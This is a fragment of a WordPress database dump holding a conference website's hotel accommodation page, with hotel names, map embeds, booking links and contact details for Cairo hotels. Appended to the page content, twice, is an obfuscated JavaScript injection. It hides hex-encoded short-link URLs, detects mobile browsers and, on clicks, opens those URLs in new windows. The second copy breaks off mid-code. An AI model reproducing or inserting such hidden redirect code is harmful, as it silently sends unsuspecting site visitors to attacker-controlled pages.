</a></strong></span></h4>\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2689\" bg_color=\"rgba(255,255,255,0.01)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Kempinski Nile Hotel Garden City Cairo</span></h2>\n<ul>\n 	<li><strong><span style=\"font-size: 12pt; color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></span></strong></li>\n</ul>\n&nbsp;\n\n&nbsp;\n\n&nbsp;\n\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-autosave-v1','','','2023-08-15 16:42:26','2023-08-15 16:42:26','',2685,'https://gsw2023.com/?p=5075',0,'revision','',0),
(5076,1,'2023-08-02 14:36:20','2023-08-02 14:36:20','<p>[vc_row][vc_column][dt_banner image_id=\"2683\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">INTERCONTINENTAL CAIRO SEMIRAMIS</span></h2>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"></iframe></p>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\"><a style=\"color: #ffff00;\" href=\"https://www.ihg.com/redirect?path=asearch&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;checkInDate=01&amp;checkInMonthYear=082023&amp;checkOutDate=08&amp;checkOutMonthYear=082023&amp;rateCode=AAFST&amp;_PMID=99801505&amp;GPC=ARA&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">BOOK NOW</a></span></h5>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][dt_banner image_id=\"5033\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h1 style=\"text-align: center;\"><span style=\"font-size: 36pt; color: #ffffff;\">Ramses Hilton hotel</span></h1>\n<h4></h4>\n<ul>\n<li><strong><span style=\"color: #0000ff; font-size: 12pt;\"><a style=\"color: #0000ff;\" href=\"https://www.guestreservations.com/ramses-hilton/booking?msclkid=5045658d464f1148cfd9013a670fd9bc\">Ramses Hilton Hotel &amp; Casino</a></span></strong></li>\n</ul>\n<p>&nbsp;</p>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.5319929288576!2d31.22717948709823!3d30.050281810255406!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c381a29537%3A0xf1d5b3a64a0e4de1!2sRamses%20Hilton!5e0!3m2!1sen!2ssa!4v1689723107695!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong>Deadline for the Special Rates is August 10, 2023</strong></span></h5>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.hilton.com/en/attend-my-event/cairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0/\" target=\"_blank\" rel=\"noopener\"><span style=\"color: #ffff00; font-size: 14pt;\"><strong>BOOK NOW</strong></span></a></p>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4726\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"font-size: 24pt; color: #ffff00;\">Flamenco Cairo Hotel</span></h2>\n<h4><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"https://www.flamencohotels.com/web/?page_id=5462\">Start – Flamenco (flamencohotels.com)</a></strong></span></h4>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m16!1m12!1m3!1d27631.27179417239!2d31.19188108296991!3d30.039469195243615!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!2m1!1sFlamenco%20Cairo%20Hotel!5e0!3m2!1sen!2ssa!4v1689724196436!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4><span style=\"color: #3366ff;\">Deadline for the Special Rates is August 10, 2023</span></h4>\n<p>&nbsp;</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #3366ff;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/flamenco-cairo-hotel/\"><span style=\"font-size: 18pt;\">BOOK NOW </span> </a></strong></span></h2>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: left;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<h2 style=\"text-align: center;\"><span style=\"color: #3366ff; font-size: 14pt;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\"><span style=\"font-size: 24pt;\">BOOK NOW </span> </a></strong></span></h2>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 14pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4788\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Grand Nile Tower Hotel</span></h2>\n<ul>\n<li><span style=\"color: #ffffff;\"><a style=\"color: #ffffff;\" href=\"https://www.grandniletower.com/\">https://www.grandniletower.com/</a></span></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3454.091887744032!2d31.22467591511475!3d30.03422158188607!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x14584090695d6421%3A0x201285387107863a!2sGrand%20Nile%20Tower!5e0!3m2!1sen!2ssa!4v1689721277379!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h1 style=\"text-align: center;\"><span style=\"color: #3366ff; font-size: 24pt;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/grand-nile-tower-hotel/\">BOOK NOW</a></strong></span></h1>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4730\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Novotel Cairo El Borg</span></h2>\n<ul>\n<li><span style=\"color: #ffffff; font-size: 12pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></strong></span></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<ul>\n<li>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n</li>\n</ul>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/novotel-cairo-el-borg/\"><span style=\"color: #ffff00;\">BOOK NOW </span> </a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2689\" bg_color=\"rgba(255,255,255,0.01)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Kempinski Nile Hotel Garden City Cairo</span></h2>\n<ul>\n<li><strong><span style=\"font-size: 12pt; color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></span></strong></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<h5><span style=\"color: #ffffff;\">2, Kasr El Nil St., P.O. Box 28 Bab El khalq Cairo| Egypt</span></h5>\n<h5><span style=\"color: #ffffff;\">T +202 2575 0777 | F +202 2574 4333</span></h5>\n<h5><span style=\"color: #ffffff;\">Email: Reservations.eltahrir@steigenberger.com</span></h5>\n<h5></h5>\n<h5><span style=\"color: #ffffff;\">ahmed.gaby@steigenberger.com</span><br />\n<span style=\"color: #ffffff;\">Mobile: </span><span style=\"color: #ffffff;\">+20 100 046 6312</span></h5>\n<h5></h5>\n<p>&nbsp;[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a